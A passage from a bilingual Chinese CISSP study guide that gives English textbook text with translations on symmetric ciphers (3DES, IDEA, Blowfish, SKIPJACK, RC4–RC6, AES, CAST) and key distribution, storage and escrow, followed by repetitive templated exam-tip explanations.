要求。 因此,应避免使用3DES加密,尽管某些产品可能仍支持它。 自2024年1月1日起,美国联邦政府正式禁止在政府数据中使用3 DES。 该算法在私营行业中仍被使用。 3DES有多种不同变体,每种使用不同数量的独立密钥。 前两种, DES‑EDE3和DES‑EEE3,使用三个独立密钥:K1, 、K2, 和K3。 两者之间的区 别在于所使用的操作,分别用字母E表示加密,D表示解密。 DES‑EDE3使用 K1加密数据,使用K2解密生成的密文,然后使用K3再次加密该文本。 DES‑EDE3可以使用以下符号表示,其中E(K,P)表示使用密钥K对明文P进行加 密,D(K,C)表示使用密钥K对密文C进行解密: E(K1,D(K2,E(K3,P))) 另一方面,DES‑EEE3按顺序使用全部三个密钥对数据进行加密,可表示 如下: E(K1,E(K2,E(K3,P))) 如果你想知道为什么在EDE3模式的中间会有一个解密操作,那是创 建该算法并提供与DES向后兼容性的过程所遗留的晦涩产物。 加密和解密 是可逆操作,因此即使使用了解密函数,仍可将其视为一轮加密。

从数学上讲,DES‑EEE3 和 DES‑EDE3 的有效密钥长度应为 168 位。 然而, 已知对这一算法的攻击将其有效强度降低至 112 位。

小白解释

场景先行:你是公司的安全负责人,正在读第 408 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
学习单元 38 / PDF P409

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

This discussion raises an obvious question—what happened to Double DES (2DES)? You'll read in Chapter 7 that Double DES was tried but quickly abandoned when it was proven that an attack known as the meet-in-the-middle attack rendered it no more secure than standard DES. International Data Encryption Algorithm The International Data Encryption Algorithm (IDEA) block cipher was developed in response to complaints about the insufficient key length of the DES algorithm. Like DES, IDEA operates on 64-bit blocks of plaintext/ciphertext. However, it begins its operation with a 128-bit key. This key is broken up in a series of operations into 52 16-bit subkeys.

The subkeys then act on the input text using a combination of XOR and modulus operations to produce the encrypted/decrypted version of the input message. IDEA is capable of operating in the same five modes used by DES: ECB, CBC, CFB, OFB, and CTR. All of this material on key length block size and the number of rounds of encryption may seem dreadfully boring; however, it's important material, so be sure to brush up on it while preparing for the exam. The IDEA algorithm was patented by its Swiss developers. However, the patent expired in 2012, and it is now available for unrestricted use.

One popular implementation of IDEA is found in Phil Zimmermann's popular Pretty Good Privacy (PGP) secure email package. Chapter 7 covers PGP in further detail. Blowfish Bruce Schneier's Blowfish block cipher is another alternative to DES and IDEA. Like its predecessors, Blowfish operates on 64-bit blocks of text. However, it extends IDEA's key strength even further by allowing the use of variable-length keys ranging from a relatively insecure 32 bits to an extremely

中文直译 / 整理

这一讨论引发了一个显而易见的问题——双 DES(2DES)发生了什么? 你将在第 7 章中读到,双 DES 曾被尝试过,但当证明一种称为中间相遇攻 击的方法使其安全性并不比标准 DES 更高时,它便被迅速弃用了。 国际数据加密算法 国际数据加密算法(IDEA)分组密码是为回应对DES算法密钥长度不足的投 诉而开发的。 与DES类似,IDEA在64位的明文/密文块上操作。 然而,它使用 128位密钥开始操作。 该密钥通过一系列操作分解为52个16位子密钥。 这些子 密钥随后通过异或和模运算的组合作用于输入文本,以生成输入消息的加密/解 密版本。 IDEA能够以与DES相同的五种模式运行:ECB、CBC、CFB、 OFB和CTR。 所有关于密钥长度、分组大小和加密轮数的这些内容可能看起来极其 枯燥; 然而,这些内容非常重要,因此在备考时务必复习巩固。 IDEA算法由其瑞士开发者申请了专利。 然而,该专利已于2012年到期,现 在可免费无限制使用。 IDEA的一个流行实现位于Phil Zimmermann广受 欢迎的Pretty Good Privacy(PGP)安全电子邮件软件中。 第7章将进一 步详细介绍PGP。

河豚 布鲁斯·施奈尔的Blowfish分组密码是DES和IDEA的另一种替代方案。 与它的前身 一样,Blowfish对64位的数据块进行操作。 然而,它通过允许使用长度可变的密钥, 将IDEA的密钥强度进一步提升,密钥长度可从相对不安全的32位到极其

小白解释

场景先行:你是公司的安全负责人,正在读第 409 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

DREAD:DREAD 用五个维度给威胁打分。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

DREAD 是风险评分方法,不是威胁类别。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
DREAD DREAD 用五个维度给威胁打分。
学习单元 39 / PDF P410

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

strong 448 bits. Obviously, the longer keys will result in corresponding increases in encryption/decryption time. However, time trials have established Blowfish as a much faster algorithm than both IDEA and DES. Also, Schneier released Blowfish for public use with no license required. Blowfish encryption is built into a number of commercial software products and operating systems. A number of Blowfish libraries are also available for software developers, and it is often used for Secure Shell (SSH) connections. SKIPJACK Developed by the U.S. National Security Agency (NSA), the algorithm code named SKIPJACK was approved for use by the U.S.

government in Federal Information Processing Standard (FIPS) 185, the Escrowed Encryption Standard (EES) in 1994. SKIPJACK uses an 80-bit key and operates on 64-bit blocks of text. SKIPJACK was quickly embraced by the U.S. government and provided the cryptographic routines supporting the Clipper and Capstone encryption chips. However, SKIPJACK had an added twist—it supports the escrow of encryption keys. At the time, two government agencies, the National Institute of Standards and Technology (NIST) and the U.S. Department of the Treasury, each held a portion of the information required to reconstruct a SKIPJACK key.

When law enforcement authorities obtained legal authorization, they would contact the two agencies to obtain the pieces of the key, enabling them to decrypt communications between the affected parties. SKIPJACK and the Clipper chip were not embraced by the cryptographic community at large because of its mistrust of the escrow procedures in place within the U.S. government. Rivest Ciphers Ron Rivest, of Rivest-Shamir-Adleman (RSA) Data Security, created a series of symmetric ciphers over the years known as the Rivest Ciphers (RC) family of algorithms. Several of these, RC4, RC5, and RC6, have particular importance today.

Rivest Cipher 4 (RC4) RC4 is a stream cipher developed by Rivest in 1987 and very widely used during the decades that followed. It uses a single round of encryption and allows the use of variable-length keys ranging from 40 bits to 2,048 bits.

中文直译 / 整理

强大的448位。 显然,密钥越长,加密/解密所需的时间也相应增加。 然而,时 间测试表明,Blowfish算法比IDEA和DES都快得多。 此外,施奈尔发布了 Blowfish供公众使用,无需任何许可证。 Blowfish加密已被集成到多种商业 软件产品和操作系统中。 许多Blowfish库也供软件开发者使用,它常用于安 全外壳(SSH)连接。 SKIPJACK 由美国国家安全局(NSA)开发,算法代号为SKIPJACK的加密方案于1994年 被美国政府批准用于联邦信息处理标准(FIPS)185,即托管加密标准(EES)。 SKIPJACK使用80位密钥,对64位数据块进行操作。 SKIPJACK迅速被美国政 府采纳,并为Clipper和Capstone加密芯片提供了加密例程支持。 然而,SKIPJACK有一个额外的特点——它支持加密密钥的托管。 当时,两个政 府机构——国家标准与技术研究院(NIST)和美国财政部——各自持有一部分 重建SKIPJACK密钥所需的信息。 当执法机构获得法律授权后,他们会联系这 两个机构以获取密钥的片段,从而能够解密相关方之间的通信。

SKIPJACK 和 Clipper 芯片未被密码学界广泛接受,因为人们对其在美国政 府内部实施的托管程序缺乏信任。 Rivest 密码 来自 Rivest‑Shamir‑Adleman(RSA)数据安全公司的 Ron Rivest 多年来 创建了一系列对称密码,称为 Rivest 密码(RC)算法家族。 其中,RC4、 RC5 和 RC6 在今天具有特别重要的意义。 Rivest 密码 4(RC4) RC4是由Rivest于1987年开发的一种流密码,在随后的几十年中被广泛使 用。 它使用单轮加密,并允许使用40位到2,048位的可变长度密钥。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 40 / PDF P411

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

RC4's adoption was widespread because it was integrated into the Wired Equivalent Privacy (WEP), Wi-Fi Protected Access (WPA), Secure Sockets Layer (SSL), and Transport Layer Security (TLS) protocols. A series of attacks against this algorithm render it insecure for use today. WEP, WPA, and SSL no longer meet modern security standards for both this and other reasons. TLS no longer allows the use of RC4 as a stream cipher. Rivest Cipher 5 (RC5) RC5 is a block cipher of variable block sizes (32, 64, or 128 bits) that uses key sizes between 0 (zero) length and 2,040 bits. It is important to note that RC5 is not simply the next version of RC4.

In fact, it is completely unrelated to the RC4 cipher. Instead, RC5 is an improvement on an older algorithm called RC2 that is no longer considered secure. RC5 is the subject of brute-force cracking attempts. A large-scale effort leveraging massive community computing resources cracked a message encrypted using RC5 with a 64-bit key, but this effort took more than four years to crack a single message. Rivest Cipher 6 (RC6) RC6 is a block cipher that was developed as the next version of RC5. It uses a 128-bit block size and allows the use of 128-, 192-, or 256-bit symmetric keys.

This algorithm was one of the candidates for selection as the Advanced Encryption Standard (AES) discussed in the next section, but it was not selected and is not widely used today. Advanced Encryption Standard In October 2000, NIST announced that the Rijndael (pronounced “rhinedoll”) block cipher had been chosen as the replacement for DES. In November 2001, NIST released FIPS 197, which mandated the use of AES/Rijndael for the encryption of all sensitive but unclassified data by the U.S. government. The Advanced Encryption Standard (AES) cipher allows the use of three key strengths: 128 bits, 192 bits, and 256 bits.

AES only allows the processing of 128-bit blocks, but Rijndael exceeded this specification, allowing cryptographers to use a block size equal to the key length. The number of encryption rounds depends on the key length chosen: 128-bit keys require 10 rounds of encryption. RC4

中文直译 / 整理

的广泛应用是因为它被集成到了有线等效保密(WEP)、Wi‑Fi保护 访问(WPA)、安全套接层(SSL)和传输层安全(TLS)协议中。 一系列针对该算法的攻击使其在当今已不再安全。 由于此算法及其他原因,WEP、 WPA 和 SSL 已不再符合现代安全标准。 TLS 不再允许使用 RC4 作为流密码。 Rivest Cipher 5 (RC5) RC5 是一种可变块大小(32、64 或 128 位)的分组密码,密钥长度范围为 0 (零)位到 2,040 位。 需要注意的是,RC5 并非 RC4 的下一个版本。 事实上, 它与 RC4 密码完全无关。 相反,RC5 是对一种名为 RC2 的旧算法的改进,而 RC2 已不再被视为安全。 RC5 曾成为暴力破解尝试的目标。 一项大规模的协作计算项目利用庞大的 社区计算资源,成功破解了使用 64 位密钥加密的 RC5 消息,但该过程耗 时超过四年才破解一条消息。 Rivest Cipher 6 (RC6) RC6 是一种分组密码,作为 RC5 的下一代版本开发。 它使用 128 位分组大小, 并允许使用 128 位、192 位或 256 位的对称密钥。

该算法曾是下一节讨论的高 级加密标准(AES)选拔的候选者之一,但未被选中,如今也未被广泛使用。 高级加密标准 2000 年 10 月,NIST 宣布选择 Rijndael(发音为“rhine‑doll”)分组密码 作为 DES 的替代方案。 2001 年 11 月,NIST 发布了 FIPS 197,规定美国政府 必须使用 AES/Rijndael 对所有敏感但非机密的数据进行加密。 高级加密标准(AES)密码支持三种密钥强度:128 位、192 位和 256 位。 AES 仅允许处理 128 位分组,但 Rijndael 超出了这一规范,允许密码学家 使用与密钥长度相等的分组大小。 加密轮数取决于所选的密钥长度: 128位密钥需要10轮加密。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 41 / PDF P412

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

192-bit keys require 12 rounds of encryption. 256-bit keys require 14 rounds of encryption. CAST The CAST algorithms, named after their creators, Carlisle Adams and Stafford Tavares, are another family of symmetric key block ciphers that are integrated into some security solutions. The CAST algorithms use a Feistel network and come in two forms: CAST-128 uses either 12 or 16 rounds of Feistel network encryption with a key size between 40 and 128 bits on 64-bit blocks of plaintext. CAST-256 uses 48 rounds of encryption with a key size of 128, 160, 192, 224, or 256 bits on 128-bit blocks of plaintext.

The CAST-256 algorithm was a candidate for the Advanced Encryption Standard but was not selected for that purpose. Comparison of Symmetric Encryption Algorithms There are many symmetric encryption algorithms you need to be familiar with. Table 6.9 lists several common and well-known symmetric encryption algorithms along with their block size and key size. 192

中文直译 / 整理

位密钥需要12轮加密。 256位密钥需要14轮加密。 CAST CAST算法以其创建者Carlisle Adams和Stafford Tavares命名,是另一种集 成到某些安全解决方案中的对称密钥分组密码家族。 CAST算法使用Feistel网 络,有两种形式: CAST‑128在64位明文块上使用12或16轮Feistel网络加密,密钥长度为40至 128位。 CAST‑256在128位明文块上使用48轮加密,密钥长度为128、160、192、 224或256位。 CAST‑256算法曾是高级加密标准的候选算法,但未被选中用于该目的。 对称加密算法比较 您需要熟悉许多对称加密算法。 表6.9列出了几种常见且知名的对称加密算法 及其分组大小和密钥大小。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

标准:标准给出必须满足的最低要求。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

Minimum level、mandatory requirement 常对应 standard。

同一密钥、速度快、大数据加密常对应 symmetric。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
标准 标准给出必须满足的最低要求。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 42 / PDF P413

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

TABLE 6.9 Symmetric encryption memorization chart Algorithm Name Block size (Bits) Key size (Bits) Advanced Encryption Standard (AES) 128 128, 192, 256 Rijndael Variable 128, 192, 256 Blowfish 64 32–448 Data Encryption Standard (DES) 64 56 International Data Encryption Algorithm (IDEA) 64 128 Rivest Cipher 4 (RC4) N/A (Stream cipher) 40–2,048 Rivest Cipher 5 (RC5) 32, 64, 128 0–2,040 Rivest Cipher 6 (RC6) 128 128, 192, 256 SKIPJACK 64 80 Triple DES (3DES) 64 112 or 168 CAST-128 64 40–128 CAST-256 128 128, 160, 192, 224, 256 Symmetric Key Management Because cryptographic keys contain information essential to the security of the cryptosystem, it is incumbent upon cryptosystem users and administrators to take extraordinary measures to protect the security of the keying material.

These security measures are collectively known as key management practices. They include safeguards surrounding the creation, distribution, storage, destruction, recovery, and escrow of symmetric (secret) keys. Creation and Distribution of Symmetric Keys As previously mentioned, one of the major problems underlying symmetric encryption algorithms is the secure distribution of the secret keys required to operate the algorithms. The three main methods used to exchange secret keys securely are offline distribution, public key encryption, and the Diffie– Hellman key exchange algorithm.

中文直译 / 整理

表 6.9 对称加密记忆表 算法名称 分组大小 (位) 密钥大小(位) 高级加密标准(AES) 128 128、192、256 Rijndael 变量 128, 192, 256 Blowfish 64 32–448 数据加密标准(DES) 64 56 国际数据加密 算法 (IDEA) 64 128 Rivest 密码 4 (RC4) 不适用 (流密 码) 40–2,048 Rivest 密码 5 (RC5) 32, 64, 128 0–2,040 Rivest Cipher 6 (RC6) 128 128, 192, 256 SKIPJACK 64 80 Triple DES (3DES) 64 112 或 168 CAST‑128 64 40–128 CAST‑256 128 128、160、192、 224、256 对称密钥管理 由于加密密钥包含对密码系统安全至关重要的信息,因此密码系统用户和管理 员有责任采取特殊措施来保护密钥材料的安全。 这些安全措施统称为密钥管理 实践,包括围绕对称(秘密)密钥的创建、分发、存储、销毁、恢复和托管所 采取的防护措施。

对称密钥的创建与分发 如前所述,对称加密算法的一个主要问题是安全分发运行算法所需的密钥。 用 于安全交换密钥的三种主要方法是离线分发、公钥加密和Diffie–Hellman密钥 交换算法。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

同一密钥、速度快、大数据加密常对应 symmetric。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
学习单元 43 / PDF P414

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Offline Distribution The most technically simple (but physically inconvenient) method involves the physical exchange of key material. One party provides the other party with a sheet of paper or piece of storage media containing the secret key. In many hardware encryption devices, this key material comes in the form of an electronic device that resembles an actual key that is inserted into the encryption device. However, every offline key distribution method has its own inherent flaws. If keying material is sent through the mail, it might be intercepted. Telephones can be wiretapped. Papers containing keys might be inadvertently thrown in the trash or lost.

The use of offline distribution is cumbersome for end users, particularly when they are located in geographically distant locations. Public Key Encryption Many communicators want to obtain the speed benefits of secret key encryption without the hassles of key distribution. For this reason, many people use public key encryption to set up an initial communications link. Once the link is successfully established and the parties are satisfied as to each other's identity, they exchange a secret key over the secure public key link. They then switch communications from the public key algorithm to the secret key algorithm and enjoy the increased processing speed.

In general, secret key encryption is thousands of times faster than public key encryption. Diffie–Hellman In some cases, neither public key encryption nor offline distribution is sufficient. Two parties might need to communicate with each other, but they have no physical means to exchange key material, and there is no public key infrastructure in place to facilitate the exchange of a secret key. In situations like this, key exchange algorithms like the Diffie–Hellman algorithm prove to be extremely useful mechanisms. You'll find a complete discussion of Diffie–Hellman in Chapter 7.

Storage and Destruction of Symmetric Keys Another major challenge with the use of symmetric key cryptography is that all of the keys used in the cryptosystem must be kept secure. This includes following best practices surrounding the storage of encryption keys: Never store an encryption key on the same system where encrypted data resides. This just makes it easier for the attacker! For sensitive keys, consider providing two different individuals with half of the key. They then must collaborate to re-create the entire key. This is

中文直译 / 整理

离线分发 最技术上简单的(但物理上不便)方法涉及密钥材料的物理交换。 一 方向另一方提供一张纸或包含密钥的存储介质。 在许多硬件加密设备中,这种 密钥材料以类似真实钥匙的电子设备形式出现,插入加密设备中使用。 然而, 每种离线密钥分发方法都有其固有的缺陷。 如果通过邮寄发送密钥材料,可能 会被截获。 电话可能被窃听。 包含密钥的纸张可能被无意丢入垃圾桶或丢失。 对于终端用户而言,离线分发方式尤其在地理位置相距遥远时极为不便。 公钥加密 许多通信者希望在无需密钥分发麻烦的情况下获得对称密钥加密的速 度优势。 因此,许多人使用公钥加密来建立初始通信链接。 一旦链接成功建立 且双方确认了彼此的身份,他们就会通过安全的公钥链接交换一个对称密钥。 随后,他们将通信从公钥算法切换到对称密钥算法,从而享受更高的处理速度。 一般来说,对称密钥加密的速度比公钥加密快数千倍。 Diffie–Hellman 在某些情况下,公钥加密或离线分发都不足以满足需求。 两 方可能需要相互通信,但他们没有物理手段交换密钥材料,且没有可用的公钥基 础设施来促进对称密钥的交换。

在这种情况下,像Diffie–Hellman算法这样的 密钥交换算法成为极为有用的机制。 您将在第7章中找到关于Diffie–Hellman的 完整讨论。 对称密钥的存储与销毁 使用对称密钥加密的另一个主要挑战是,密码系统中使用的所有密钥都必须 得到妥善保护。 这包括遵循有关加密密钥存储的最佳实践: 绝不要将加密密钥存储在与加密数据相同的系统上。 这只会让攻击者更容易得 手! 对于敏感密钥,建议将密钥的一半分别提供给两位不同的人员。 他们必须协作 才能重新生成完整的密钥。 这是

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
身份 身份是主体在系统中的标识。
学习单元 44 / PDF P415

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

known as the principle of split knowledge (discussed earlier in this chapter). When a user with knowledge of a secret key leaves the organization or is no longer permitted access to material protected with that key, the keys must be changed, and all encrypted materials must be reencrypted with the new keys. When choosing a key storage mechanism, you have three major options available to you: Software-based storage mechanisms store keys as digital objects on the system where they are used. For example, this might involve storing the key on the local file system.

More advanced software-based mechanisms may use specialized applications to protect those keys, including the use of secondary encryption to prevent unauthorized access to the keys. Software-based approaches are generally simple to implement but introduce the risk of the software mechanism being compromised. Hardware-based storage mechanisms are dedicated hardware devices used to manage cryptographic keys. These may be personal devices, such as flash drives or smartcards that store a key used by an individual, or they may be enterprise devices, called hardware security modules (HSMs), that manage keys for an organization.

Hardware approaches are more complex and expensive to implement than software approaches, but they offer added security. Cloud-based storage mechanisms take the HSM approach and implement it in the data centers of cloud service providers. Major cloud service providers, including AWS and Microsoft, offer HSM solutions for secure key management. Key Escrow and Recovery Cryptography is a powerful tool. Like most tools, it can be used for a number of beneficent purposes, but it can also be used with malicious intent. To gain a handle on the explosive growth of cryptographic technologies, governments around the world have floated ideas to implement key escrow systems.

These systems allow the government, under limited circumstances such as a court order, to obtain the cryptographic key used for a particular communication from a central storage facility.

中文直译 / 整理

